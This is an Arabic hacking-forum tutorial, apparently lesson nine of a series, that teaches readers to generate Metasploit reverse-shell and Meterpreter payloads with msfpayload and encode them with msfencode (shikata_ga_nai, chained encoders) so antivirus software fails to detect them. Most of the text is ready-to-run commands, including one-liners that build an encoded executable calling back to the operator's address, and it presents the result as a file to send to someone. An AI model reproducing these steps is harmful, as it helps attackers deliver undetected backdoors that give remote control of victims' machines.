:: vBspiders Professional Network :: - الدرس التاسع : تشفير البايلود بالميتاسبلويت msfencode

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كيف صحتكم واوالكم وظروفك
ان شاء الله رب العالمين تكونو بألف خير وصحة وسلامة وعافية
اليوم درسنا يتكلم عن التشفير بالميتاسبلويت
لنفرض انك انشأت بايلود بالـ msfpayload وفحصته او ارسلته لأحد اظن انه رح ينكشف من برنامج الحماية
لكن درسنا اليوم رح يتم تشفير البايلود نهائي من اي حمايات
نبدأ اول شيء
نذهب لل CMD SHELL

نكتب امر

كود PHP:

   ruby msfencode -h

اظهار تعليمات حول الادرة

كود PHP:

   ruby msfencode -l

يظهر انواع التشفيرات المتوفرة وقوت كل واحد
واقوى واحدة وهي شيكاتا

كود PHP:

   x86/shikata_ga_nai

الآن نأتي لتعريف الاوامر لها والمهمة والرئيسية
-e نوع التشفير يتبعها الاسم كـ

كود PHP:

   -e x86/shikata_ga_nai

-t صيغة التشفير يتبعها الصيغة
والمتوافرة في الاداة هي 6 وهي
raw, ruby, perl, c,exe, vba
يكون الامر كـ

كود PHP:

    -t perl

-i لأستيراد بايلود صنعتة سابقا وتريد تشفيرة الآن
يكون الامر هكذا

كود PHP:

   -i C:\server.exe

او باللينكس يكون الامر متبوع بالاسم مباشرة هكذا

كود PHP:

   -i server.exe

او حسب المسار باللينكس
الان عند التشفير يجب وضع -o لأخراج الملف للخارج اذا لم تريد ان يطبعه على شكل كود برمجي وفي وندوز سواء وضعته ام لا لن يفعل شيء
لانك بآخر الكود رح تضع

كود PHP:

    >"C:\"service.exe

ويفضل وضعه

لم نتطرق الى جميع الاوامر لكن في المستقبل القريب
في الوقت هذه اللي تهمنا فقط ... باقي 5 اوامر غير مهمة كثيرا
الآن نأتي للعملي
نعرف في العادة ان صناعة اي بايلود يكون هكذا

كود PHP:

   ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 X >"C:\"server.exe

الآن هذا الامر واضح يقوم بصناعة بايلود لكن اذا ذهب وفحصته بأي موقع فحص او حماية جهازك ترى انه مكشوف
الآن هو في المسار C:\
الآن لنقم بتشفيره بالأمر

كود PHP:

   ruby msfencode -e x86/shikata_ga_nai -i C:\server.exe -t exe -o >"C:\"encoded.exe

لنوضح الاوامر بدقة

كود PHP:

   ruby msfencode

لأستخدام الاداة (التشفير)

كود PHP:

   -e x86/shikata_ga_nai

وكما ذكرت لأستخدام النوع الذي تريد التشفير به اونا اخترت شيكاتا وهو اقوى واحد مشفر من جميع الحمايات عدى اثنين او ثلاثة وهي AVG و avast والثالث لم اذكر اسمه

كود PHP:

   -i C:\server.exe

وايضا كما ذكرت لتشفير ملف تم انشائه سابقا متبوعا بالمسار واذا كان بداخل المجلد كما في اللنكس نضع فقط الاسم

كود PHP:

   -t exe

وايضا كما ذكرت سابقا لأختيار الصيغة وهنا صيغة exe ملف تنفيذي

كود PHP:

-o

لاخراجة للخارج وعدم طباعته على الشاشة

لنفرض انك تريد الشل بلغة بيرل او سي اي مطبوع على شاشة الدوس

كود PHP:

   ruby msfencode -i C:\server.exe -t c test.exe

وسترى انه طبعه على شاشة الدوس بتشفير شيكاتا
ييجي واحد ويقول ليش ما اخترنا نوع التشفير
اقوله لأن الاداة تختار التشفير شيكاتا تلقائي
الآن نقدر نسوي كل هذا من صنع بايلود وتشفيره على سطر واحد ونسمي الملف بالأخر
انظروا كيف..

كود PHP:

   ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.137 LPORT=4444 X | ruby msfencode -e x86/shikata_ga_nai -t exe >"C:\"finish.exe

اول امر وهو صناعة بايلود لكن دون وضع اسم ومكان الحفظ فقط وضعنا الصيغة exe اختصار لـ X وفصلناه مع الأمر الآخر برمز | ثم كتبنا الامر التالي وهو واضح اختيار التشفير شيكاتا والصيغة ومكان الحفظ

ويوجد ايضا التشفير بأكثر من نوع

كود PHP:

   ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.15 LPORT=4444 | ruby msfencode -e x86/shikata_ga_nai -t raw -c 5 | ruby msfencode -e cmd/generic_sh -t raw -c 5 | ruby msfencode -e x86/countdown -t perl >"C:\"3encoders.exe

كل شيء واضح عدا -t raw -c 5 اي انه يجمع الصيغة وبالىخر يتم اختيارها
الآن افحص الملف وستجده انه غير مكشوف من اي حماية
هذا هو درسنا
وان شاء الله استفدتوا
واللي مو فاهم يقول لي وانا بالخدمة
ولشباب اللينكس فقط التغييرات بسيطة مجرد من ruby الى ./ و المسار C الى اسم فقط او مسار تفضله وبأمكانك وضع اسم الملف فقط وستجده داخل مجلد اداة الميتاسبلويت
مع تحياتي
لا للاحتكار
المجهوول